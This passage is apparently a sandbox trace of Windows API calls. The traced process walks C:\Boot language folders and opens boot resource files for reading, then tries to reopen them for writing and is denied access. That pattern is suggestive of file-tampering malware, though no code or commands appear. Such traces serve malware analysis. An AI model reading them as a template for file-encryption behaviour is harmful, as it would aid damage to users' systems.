(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.551] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0083.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.551] FindFirstFileExW (in: lpFileName="C:\\Boot\\ko-KR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0083.552] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.552] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.553] AreFileApisANSI () returned 1 [0083.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.553] AreFileApisANSI () returned 1 [0083.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0083.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30 [0083.553] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.553] GetFileType (hFile=0x42c) returned 0x1 [0083.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.554] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.554] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.554] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.554] CloseHandle (hObject=0x42c) returned 1 [0083.554] AreFileApisANSI () returned 1 [0083.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30 [0083.554] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.554] GetLastError () returned 0x5 [0083.745] GetLastError () returned 0x5 [0083.745] SetLastError (dwErrCode=0x5) [0083.745] GetLastError () returned 0x5 [0083.745] SetLastError (dwErrCode=0x5) [0083.745] GetLastError () returned 0x5 [0083.745] SetLastError (dwErrCode=0x5) [0083.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.778] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.779] AreFileApisANSI () returned 1 [0083.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ko-KR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ko-KR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.779] AreFileApisANSI () returned 1 [0083.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0083.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 30 [0083.780] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.780] GetFileType (hFile=0x340) returned 0x1 [0083.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.780] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.780] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.780] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.780] CloseHandle (hObject=0x340) returned 1 [0083.781] AreFileApisANSI () returned 1 [0083.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 30 [0083.781] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.781] GetLastError () returned 0x5 [0083.781] GetLastError () returned 0x5 [0083.781] SetLastError (dwErrCode=0x5) [0083.781] GetLastError () returned 0x5 [0083.781] SetLastError (dwErrCode=0x5) [0083.781] GetLastError () returned 0x5 [0083.781] SetLastError (dwErrCode=0x5) [0083.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.781] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.781] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.781] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x693f8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Ꞡ")) returned 0 [0083.781] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0083.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.782] AreFileApisANSI () returned 1 [0083.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lt-LT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lt-LT", lpUsedDefaultChar=0x0) returned 14 [0083.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.782] AreFileApisANSI () returned 1 [0083.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0083.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lt-LT") returned 14 [0083.783] CreateFileW (lpFileName="C:\\Boot\\lt-LT" (normalized: "c:\\boot\\lt-lt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.783] GetLastError () returned 0x5 [0083.783] GetLastError () returned 0x5 [0083.783] SetLastError (dwErrCode=0x5) [0083.783] GetLastError () returned 0x5 [0083.783] SetLastError (dwErrCode=0x5) [0083.783] GetLastError () returned 0x5 [0083.783] SetLastError (dwErrCode=0x5) [0083.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.783] AreFileApisANSI () returned 1 [0083.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887e8 [0083.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887e8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lt-LT") returned 14 [0083.783] CreateFileW (lpFileName="C:\\Boot\\lt-LT" (normalized: "c:\\boot\\lt-lt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.783] GetLastError () returned 0x5 [0083.783] GetLastError () returned 0x5 [0083.783] SetLastError (dwErrCode=0x5) [0083.783] GetLastError () returned 0x5 [0083.783] SetLastError (dwErrCode=0x5) [0083.783] GetLastError () returned 0x5 [0083.783] SetLastError (dwErrCode=0x5) [0083.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: 